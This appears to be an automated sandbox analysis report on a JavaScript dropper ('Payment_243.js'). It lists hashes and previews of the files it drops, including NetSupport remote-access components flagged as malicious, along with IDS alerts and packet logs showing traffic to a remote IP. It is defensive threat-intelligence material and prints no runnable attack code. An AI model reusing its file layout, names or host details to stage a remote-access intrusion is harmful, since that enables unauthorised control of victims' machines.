                                                                                            SSDEEP:6:jN+SboYZlqqRQJOBF1Fi9MO8jCaMbNW7KuW/4kutLwyAGI/V6s:jN+oo6lqqRNhFi9MO6EW7XFVLqGO6s
                                                                                            MD5:708428751D01199ED5F53E0FB2AD4BF0
                                                                                            SHA1:93F563A090F7EE511D8774C8AF4F8FF46F0D66E6
                                                                                            SHA-256:579032CB7B7BEA083E077BA85CB62DC231BA672F93CE1B55A379968FB3C2CEE9
                                                                                            SHA-512:4A75EEAA2A973D7F726DD10E7769A22E9FDD084D9EC8A1CBA742FBB66F0A6A6343421C9FDF58C61B91920D2F3DCC99C705A2844D33B53F8FCF3D38A909B5A00B
                                                                                            Malicious:false
                                                                                            Preview:// Dictionary of default apps to install into new profiles. They will be.// dynamically downloaded and installed from CWS on profile creation..{. // Drive extension. "ghbmnnjooekpmoecnnnilnnbdlolhkhi" : {. "external_update_url": "https://clients2.google.com/service/update2/crx". }.}..

                                                                                            C:\ProgramData\i99ekubc\install\5B8FEB2AF817493Es

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\wscript.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):46460
                                                                                            Entropy (8bit):7.996244892825645
                                                                                            Encrypted:true
                                                                                            SSDEEP:768:8fAM/r+Jh0uwbtWlaaN6+H+aL6FsMSWGuPOLGIankYdaEqT4pKAdzSag3ZQr7WqM:8DrKh3wblLlJVzGykYdaC1WYWqGh
                                                                                            MD5:D224C335C82ACAA733441CE43E59C881
                                                                                            SHA1:FFC9502870FFBC116A44AE491306B7F6903D25B8
                                                                                            SHA-256:F3E8FF2CA65192446A62D85B75C8C75C105CFBB7B17A8FA67F9A0C6E87EF3EC0
                                                                                            SHA-512:D57A7902B2003B751796F2CFA1BFE4AD90A393BB1F68CE354B6D24B749937469AA8FBEE77838FC6BFFD83DC13D799C8C078783FFE236A1558B8900F71AFFAFE5
                                                                                            Malicious:false
                                                                                            Preview:TDF$QrL....`.G..l5...J.0...T.R..COg..........:...7<-.#....Q ...(....Me......I.T%Q.....}H.;....3K..pM..j+..JJ..).Q~..x?..D.e..&~..f.....(.n!.v.3.o.j...%{.....b...>..y....z...........z...E>......HJD.A.]..y.{~.wx..^U.<.w.L..~..j..[.h<:.,...b.....yb....Y...`Y..0.F....Y...\.......FJ....c....{..ne..!..89...Z.......a*si........]....N.M.Dy;RD[...m#?..\. d........w..T.P...`G...V..q.Pd..g.. 8[....2^..~4#^.k..S.5...{{.)W.2.&..P.G1L^Y.'.Q..t/...~#~z.9...:.....;t..I...b.gd ...T....#.....?A...~.f.%..U...B./.........g?7d.$.).....{B..#.E....4.N....:...mM.].LDw.C.A.7.z..)R.qi-..j.~3E....e+.q2...}'.{.."'.W.....{]|.gK..yA..;.x.2..Y..x..iP.J.I....]........;..TK..%.b...z.+.a....Q...$..r.MNL...@.S.4;...a.n.Om=....oCm,`o...Q.(......&.p.T.Y..........p..<a.#x.hQ.C.N"iu..f..A.#..CS.43N..t.Hcg....|..t......&8u....xL.Y$.)..Z4At...W.*.....Z*..z7.'2.m...ZO...)..w ..:.L.gp.....y...6.....i..AS....-.V.7{.O..C..... ...?V$..NP........'..v){.pk....TV.UQ?'.a.h...eZYy....F...q/O.\....

                                                                                            C:\ProgramData\i99ekubc\install\5F3010ACA99103ABs

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\wscript.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):125324
                                                                                            Entropy (8bit):7.998476693287313
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:M+uqGKz72juA1+hbRI2QG6Btjjo6fiZZ86cNdbt:M+uqdvZndRIZPE6scN
                                                                                            MD5:74C052D8AF6C37EBA1FBF76663A8522E
                                                                                            SHA1:9315AE6AEB3E913F053D53A1F7EA1A29692E90E7
                                                                                            SHA-256:5110690167DBB46389FF5792EB2672ED41EA5983382207D1E365C4634E620B7E
                                                                                            SHA-512:A8ACA06CAF290F879E8DAA672A681D53F191E8F03C90BAFB49856616248205B33A8C466DC25D81FE215F0D66E42F2D7221075250B3BE6C4299491CCAFDE08220
                                                                                            Malicious:false
                                                                                            Preview:TDF$PrL....pb ...8'[.tt).$b..G...k.X1...}(.50.........qZ!G.A..?..=.ZN..>.).....:........*.O..!%.pw....y).UK......v.}v.K...)q..z?.G(..`..<....jy...Ojz?y......!&....j.bO.!../..7...2P...GQ......}!.>..b".\i...g...U.S..g.,..tW.........m.,9..8.S.+.....F)..b7.P..+..1..M.d-.v.u.W^./...Vb.2.E.......8kn..sK.SL.S..lPA4..Z.K3....{.7y..U.F.L[...V2t.q.U...n...C..Pn..H..bb..<.........f.^.K/d.\........o.hw....l..In[Oa....H.<..nW..+H... ..x.%y..|..^.?....\.G.X.......q....:.D.EE..Z.x....3..K...)......0.....(...{.W.;bw.Xtj...u.m...No.t...g.Q...V)..O..{po.@9.....e...i.p.}sN.J...(.j_V...f.EF..Sj.^....q.....W..7...^.I...%..R&..8K..^N..;.b.`X....N/S....z....e..K.ORI.gc......*;.n.q9.}^.........zL.T0.....-.H...I..Pv.349k.q.$.U.u.6w..m..ar.CX.....:$V;^..............OO...F..........%cxnbqE'\...+.."...u..`...`n....z..Hw.W$.$.......i........X..1D.M.....%..g....V7J..'.b.+)?...e...-... ...;.....%....;....3s.p...L..|/*.a.................F@.2nl.K.o-7.0,.h.k...

                                                                                            C:\ProgramData\i99ekubc\install\api-ms-win-core-localization-l1-2-0.dll

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\wscript.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):21184
                                                                                            Entropy (8bit):6.98505637818331
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:9OMw3zdp3bwjGjue9/0jCRrndbVW2hWKgbCA0GftpBjbQywPAOll7PedGGZ:9OMwBprwjGjue9/0jCRrndbzM8iFFGkt
                                                                                            MD5:3B9D034CA8A0345BC8F248927A86BF22
                                                                                            SHA1:95FAF5007DAF8BA712A5D17F865F0E7938DA662B
                                                                                            SHA-256:A7AC7ECE5E626C0B4E32C13299E9A44C8C380C8981CE4965CBE4C83759D2F52D
                                                                                            SHA-512:04F0830878E0166FFD1220536592D0D7EC8AACD3F04340A8D91DF24D728F34FBBD559432E5C35F256D231AFE0AE926139D7503107CEA09BFD720AD65E19D1CDC
                                                                                            Malicious:false
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\ProgramData\i99ekubc\install_state.json

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\wscript.exe
                                                                                            File Type:ASCII text, with CRLF, LF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1794
                                                                                            Entropy (8bit):3.5509498109363986
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:eCrjdMrTm893chS4Mw2n1iFotb496fjCuTiBCVXTbzVHeEVt:/rS0EQn8bB+EVt
                                                                                            MD5:3F78A0569C858AD26452633157103095
                                                                                            SHA1:8119BCC1D66B17CCD286FEF396FA48594188C4D0
                                                                                            SHA-256:D53FC339533D39F413DDD29A69ADE19F2972383DB8FB8938D77D2E79C8573F36
                                                                                            SHA-512:89842E39703970108135D71CE4C039DF19C18F04C280CB2516409758F9D22E0205567B08DBE527A6FB7C295BDA2EA8EE6A368D6FCAF6FB59645D31EF2243AD3D
                                                                                            Malicious:false
                                                                                            Preview://353b2d6049dd2f0998bdd73f13855b290ad0be89f62d61dbc2672253e4fb72da.{.. "install": {.. "clids": {.. "clid1": {.. "clid": "1985548",.. "vid": "225".. },.. "clid10": {.. "clid": "1985553",.. "vid": "225".. },.. "clid100004": {.. "clid": "1985555",.. "vid": "225".. },.. "clid1010": {.. "clid": "2372823",.. "vid": "".. },.. "clid15": {.. "clid": "1985554",.. "vid": "225".. },.. "clid21": {.. "clid": "2372816",.. "vid": "".. },.. "clid25": {.. "clid": "2372817",.. "vid": "".. },.. "clid28": {.. "clid": "2372813",.. "vid": "".. },.. "clid29": {.. "clid": "2372821",.. "vid": "".. },.. "clid30": {.. "clid": "2372822",.. "v

                                                                                            C:\ProgramData\i99ekubc\msvcr100.dll

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\wscript.exe
                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):773968
                                                                                            Entropy (8bit):6.901559811406837
                                                                                            Encrypted:false
                                                                                            SSDEEP:12288:nMmCy3nAgPAxN9ueqix/HEmxsvGrif8ZSy+rdQw2QRAtd74/vmYK6H3BVoe3z:MmCy3KxW3ixPEmxsvGrm8Z6r+JQPzV7z
                                                                                            MD5:0E37FBFA79D349D672456923EC5FBBE3
                                                                                            SHA1:4E880FC7625CCF8D9CA799D5B94CE2B1E7597335
                                                                                            SHA-256:8793353461826FBD48F25EA8B835BE204B758CE7510DB2AF631B28850355BD18
                                                                                            SHA-512:2BEA9BD528513A3C6A54BEAC25096EE200A4E6CCFC2A308AE9CFD1AD8738E2E2DEFD477D59DB527A048E5E9A4FE1FC1D771701DE14EF82B4DBCDC90DF0387630
                                                                                            Malicious:false
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:.y.~...~...~...w...}...~.......eD.....eD..+...eD..J...eD......eD......eD......eD......Rich~...................PE..L......M.........."!.........................0.....x......................................@..........................H......d...(.......................P.......$L...!..8...........................hE..@............................................text...!........................... ..`.data....Z...0...N..................@....rsrc................f..............@..@.reloc..$L.......N...j..............@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\ProgramData\i99ekubc\nskbfltr.inf

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\wscript.exe
                                                                                            File Type:Windows setup INFormation
                                                                                            Category:dropped
                                                                                            Size (bytes):328
                                                                                            Entropy (8bit):4.93007757242403
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:a0S880EeLL6sWqYFcf8KYFEAy1JoHBIr2M2OIAXFYJKRLIkg/LH2yi9vyifjBLWh:JShNvPG1JoHBx2XFhILH4Burn
                                                                                            MD5:26E28C01461F7E65C402BDF09923D435
                                                                                            SHA1:1D9B5CFCC30436112A7E31D5E4624F52E845C573
                                                                                            SHA-256:D96856CD944A9F1587907CACEF974C0248B7F4210F1689C1E6BCAC5FED289368
                                                                                            SHA-512:C30EC66FECB0A41E91A31804BE3A8B6047FC3789306ADC106C723B3E5B166127766670C7DA38D77D3694D99A8CDDB26BC266EE21DBA60A148CDF4D6EE10D27D7
                                                                                            Malicious:false
                                                                                            Preview:; nskbfltr.inf..;..; NS Keyboard Filter..; ..;..; This inf file installs the WDF Framework binaries....[Version]..Signature="$Windows NT$"..Provider=NSL......;..;--- nskbfltr Coinstaller installation ------..;......[nskbfltr.NT.Wdf]..KmdfService = nskbfltr, nskbfltr_wdfsect....[nskbfltr_wdfsect]..KmdfLibraryVersion = 1.5......

                                                                                            C:\ProgramData\i99ekubc\nsm_vpro.ini

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\wscript.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):46
                                                                                            Entropy (8bit):4.532048032699691
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:lsylULyJGI6csM:+ocyJGIPsM
                                                                                            MD5:3BE27483FDCDBF9EBAE93234785235E3
                                                                                            SHA1:360B61FE19CDC1AFB2B34D8C25D8B88A4C843A82
                                                                                            SHA-256:4BFA4C00414660BA44BDDDE5216A7F28AECCAA9E2D42DF4BBFF66DB57C60522B
                                                                                            SHA-512:EDBE8CF1CBC5FED80FEDF963ADE44E08052B19C064E8BCA66FA0FE1B332141FBE175B8B727F8F56978D1584BAAF27D331947C0B3593AAFF5632756199DC470E5
                                                                                            Malicious:false
                                                                                            Preview:[COMMON]..Storage_Enabled=0..Debug_Level=0....

                                                                                            C:\ProgramData\i99ekubc\pcicapi.dll

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\wscript.exe
                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):33144
                                                                                            Entropy (8bit):6.7376663312239256
                                                                                            Encrypted:false
                                                                                            SSDEEP:768:JFvNhAyi5hHA448qZkSn+EgT8ToDXTVi0:JCyoHA448qSSzgIQb
                                                                                            MD5:34DFB87E4200D852D1FB45DC48F93CFC
                                                                                            SHA1:35B4E73FB7C8D4C3FEFB90B7E7DC19F3E653C641
                                                                                            SHA-256:2D6C6200508C0797E6542B195C999F3485C4EF76551AA3C65016587788BA1703
                                                                                            SHA-512:F5BB4E700322CBAA5069244812A9B6CE6899CE15B4FD6384A3E8BE421E409E4526B2F67FE210394CD47C4685861FAF760EFF9AF77209100B82B2E0655581C9B2
                                                                                            Malicious:true
                                                                                            Yara Hits:
                                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\i99ekubc\pcicapi.dll, Author: Joe Security
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 16%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+-..E~..E~..E~.\.~..E~.\.~..E~...~..E~..D~..E~.\.~..E~.\.~..E~.\.~..E~.\.~..E~...~..E~.\.~..E~Rich..E~........PE..L......U...........!.....2...........<.......P...............................`............@..........................^.......W..d....@..x............X..x)...P......`Q...............................V..@............P..@............................text....1.......2.................. ..`.rdata.......P.......6..............@..@.data...,....`.......F..............@....rsrc...x....@.......H..............@..@.reloc.......P.......P..............@..B........................................................................................................................................................................................................................................................................................................................

                                                                                            C:\ProgramData\i99ekubc\remcmdstub.exe

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\wscript.exe
                                                                                            File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):63864
                                                                                            Entropy (8bit):6.446503462786185
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:Tf6fvDuNcAjJMBUHYBlXU1wT2JFqy9BQhiK:D6f7cjJ4U4I1jFqy92hiK
                                                                                            MD5:6FCA49B85AA38EE016E39E14B9F9D6D9
                                                                                            SHA1:B0D689C70E91D5600CCC2A4E533FF89BF4CA388B
                                                                                            SHA-256:FEDD609A16C717DB9BEA3072BED41E79B564C4BC97F959208BFA52FB3C9FA814
                                                                                            SHA-512:F9C90029FF3DEA84DF853DB63DACE97D1C835A8CF7B6A6227A5B6DB4ABE25E9912DFED6967A88A128D11AB584663E099BF80C50DD879242432312961C0CFE622
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 29%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......$U..`4..`4..`4..{.D.q4..{.p.54..iLI.e4..`4..74..{.q.}4..{.@.a4..{.G.a4..Rich`4..................PE..L......U.....................J.......!............@.......................... .......o....@....................................<.......T...............x)..............................................@...............@............................text............................... ..`.rdata...%.......&..................@..@.data....-..........................@....rsrc...T...........................@..@.reloc..p...........................@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\ProgramData\i99ekubc\webmmux.dll

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\wscript.exe
                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):265816
                                                                                            Entropy (8bit):6.521007214956242
                                                                                            Encrypted:false
                                                                                            SSDEEP:3072:MW218gr7s2yIHB0pTPdTX9zUbEbStE97zjAs1RtTcJTfIv0se7POWu/HgsGU1VTl:MWSfr7sXSmPDbKPJ6/AsNk+1x
                                                                                            MD5:49C51ACE274D7DB13CAA533880869A4A
                                                                                            SHA1:B539ED2F1A15E2D4E5C933611D736E0C317B8313
                                                                                            SHA-256:1D6407D7C7FFD2642EA7F97C86100514E8E44F58FF522475CB42BCC43A1B172B
                                                                                            SHA-512:13440009E2F63078DCE466BF2FE54C60FEB6CEDEED6E9E6FC592189C50B0780543C936786B7051311089F39E9E3CCB67F705C54781C4CAE6D3A8007998BEFBF6
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........@~..!..!..!...p...!...p..!...p..+!..M...!..M...!..!...!..M...!..s..!..s..!..s..!..s..!..Rich.!..................PE..L...{..T...........!.........N.......k.......................................0..............................................4...x.......................X......../..................................Ha..@...............l............................text............................... ..`.rdata..v...........................@..@.data....B......."..................@....rsrc...............................@..@.reloc.../.......0..................@..B........................................................................................................................................................................................................................................................................................................

                                                                                            C:\ProgramData\i99ekubc\webmvorbisencoder.dll

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\wscript.exe
                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):880216
                                                                                            Entropy (8bit):5.239371133407635
                                                                                            Encrypted:false
                                                                                            SSDEEP:12288:vTAPYZEyRr+NDnaLyx2lz8MSjtX08pYRc29qcQmsGahsQZsbRN9S:YYF+Eyx2lzujtEIYRc1cQmsGa7ON9S
                                                                                            MD5:642DC7E57F0C962B9DB4C8FB346BC5A7
                                                                                            SHA1:ACEE24383B846F7D12521228D69135E5704546F6
                                                                                            SHA-256:63B4B5DB4A96A8ABEC82B64034F482B433CD4168C960307AC5CC66D2FBF67EDE
                                                                                            SHA-512:FB163A0CE4E3AD0B0A337F5617A7BF59070DF05CC433B6463384E8687AF3EDC197E447609A0D86FE25BA3EE2717FD470F2620A8FC3A2998A7C3B3A40530D0BAE
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A....u...u...u..C$G.3u..C$y.Iu..C$x..u...V..u...S..u...u..ju...H..u...'}.&u...'D..u...'C..u...'F..u..Rich.u..........................PE..L...s..T...........!.........R..............0......................................:W....@.........................`...........d....P..p............R..X....`...D......................................@............0..T............................text...}........................... ..`.rdata.......0......."..............@..@.data...|<..........................@..._RDATA.......@......................@..@.rsrc...p....P......................@..@.reloc...D...`...F..................@..B........................................................................................................................................................................................................................................................

                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\xxx[1].zip

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\wscript.exe
                                                                                            File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                            Category:dropped
                                                                                            Size (bytes):2845498
                                                                                            Entropy (8bit):7.997717653428638
                                                                                            Encrypted:true
                                                                                            SSDEEP:49152:b7X1ZldlEDThXBJOhHyx6J6h2SFFGf0RBNTQfYc9jh23eWeB3/YSBm7WIqRpykTo:X1wFXa4hRFY89YYc9jh23redpmQRZCP7
                                                                                            MD5:4C1AFE882E6D7C945A8397DCB02A2478
                                                                                            SHA1:85BA754BB1515A1EDC4054A8A3396C238DCE2B7E
                                                                                            SHA-256:67F6FC03CD53FB2A5AB17B97CAAE29B4FD0E0AFB7ADF4C9C64CDB2F7F99D03D4
                                                                                            SHA-512:A1778AE5F89DBBC57AC70C8A8B1CC419DFE015C7F9C9A58AC9957AB3723EDF812A4681CAF167EC63D0EA571448DC01FE01E5B12C5538C98B6BA404CAD2F79B0F
                                                                                            Malicious:false
                                                                                            Preview:PK........Dw*Z................install/PK.........P)Z..Q~....|.......install/5B8FEB2AF817493Es.....TDF$QrL....`.G..l5...J.0...T.R..COg..........:...7<-.#....Q ...(....Me......I.T%Q.....}H.;....3K..pM..j+..JJ..).Q~..x?..D.e..&~..f.....(.n!.v.3.o.j...%{.....b...>..y....z...........z...E>......HJD.A.]..y.{~.wx..^U.<.w.L..~..j..[.h<:.,...b.....yb....Y...`Y..0.F....Y...\.......FJ....c....{..ne..!..89...Z.......a*si........]....N.M.Dy;RD[...m#?..\. d........w..T.P...`G...V..q.Pd..g.. 8[....2^..~4#^.k..S.5...{{.)W.2.&..P.G1L^Y.'.Q..t/...~#~z.9...:.....;t..I...b.gd ...T....#.....?A...~.f.%..U...B./.........g?7d.$.).....{B..#.E....4.N....:...mM.].LDw.C.A.7.z..)R.qi-..j.~3E....e+.q2...}'.{.."'.W.....{]|.gK..yA..;.x.2..Y..x..iP.J.I....]........;..TK..%.b...z.+.a....Q...$..r.MNL...@.S.4;...a.n.Om=....oCm,`o...Q.(......&.p.T.Y..........p..<a.#x.hQ.C.N"iu..f..A.#..CS.43N..t.Hcg....|..t......&8u....xL.Y$.)..Z4At...W.*.....Z*..z7.'2.m...ZO...)..w ..:.L.gp.....y...6

                                                                                            Static File Info

                                                                                            General

                                                                                            File type:ASCII text
                                                                                            Entropy (8bit):5.508101926235647
                                                                                            TrID:
                                                                                              File name:Payment_243.js
                                                                                              File size:5'736'023 bytes
                                                                                              MD5:19cef6a2f4055703922f3e8fd2c92fb9
                                                                                              SHA1:e6ccef88b3cbba0424a39edab01697716fd8d813
                                                                                              SHA256:d0480e3927154036684ba2a60dba9576234bae2aa484294c3d925923de55196f
                                                                                              SHA512:0976d92c923aa47d9667c8881f32217fa78ca8b60ed7963adf332ce3874699abc69d86610a25d51f228e6fd801e9358bc22ec1e06dfb2fa32b9efaa153c53b54
                                                                                              SSDEEP:49152:v7DIzjCxbxqHlpM1MNN0D6hO22DzhYzYBmv9+8pJm3hp/KP1G6C+3qUxc8g7cEXQ:C
                                                                                              TLSH:70465A0DAEF70091A923313C8FAF680AB674801B1509DD147D9DA3945FA953867FEFE8
                                                                                              File Content Preview:./*.* Licensed to the Apache Software Foundation (ASF) under one.* or more contributor license agreements. See the NOTICE file.* distributed with this work for additional information.* regarding copyright ownership. The ASF licenses this file.* to you u

                                                                                              File Icon

                                                                                              Icon Hash:68d69b8bb6aa9a86

                                                                                              Network Behavior

                                                                                              Suricata IDS Alerts

                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                              2025-01-14T16:25:36.126119+01001810004Joe Security ANOMALY Microsoft Office HTTP activity1192.168.2.224916345.155.249.21580TCP

                                                                                              Network Port Distribution

                                                                                              TCP Packets

                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Jan 14, 2025 16:25:35.522494078 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:35.527383089 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:35.527452946 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:35.527911901 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:35.532807112 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:36.126008034 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:36.126028061 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:36.126034975 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:36.126068115 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:36.126079082 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:36.126099110 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:36.126118898 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:36.126118898 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:36.126136065 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:36.126162052 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:36.126163006 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:36.126171112 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:36.126209974 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:36.126466990 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:36.126513004 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:36.126522064 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:36.126549006 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:36.131138086 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:36.131160021 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:36.131180048 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:36.131196976 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:36.131216049 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:36.131308079 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:36.131331921 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:36.131340027 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:36.131361961 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:36.131383896 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:36.212207079 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:36.212233067 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:36.212248087 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:36.212268114 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:36.212272882 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:36.212285995 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:36.212312937 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:36.212312937 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:36.212312937 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:36.212529898 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:36.212554932 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:36.212585926 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:36.212706089 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:36.212718010 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:36.212738991 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:36.212738991 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:36.212750912 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:36.212765932 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:36.213078976 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:36.213089943 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:36.213119984 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:36.213258028 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:36.213269949 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:36.213290930 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:36.213293076 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:36.213305950 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:36.213315964 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:36.213326931 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:36.213335991 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:36.213347912 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:36.213362932 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:36.213932991 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:36.213980913 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:36.213992119 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:36.214011908 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:36.214015007 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:36.214025974 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:36.214040041 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:36.214085102 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:36.214097023 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:36.214128971 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:36.214816093 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:36.214849949 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:36.214863062 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:36.214874983 CET804916345.155.249.215192.168.2.22
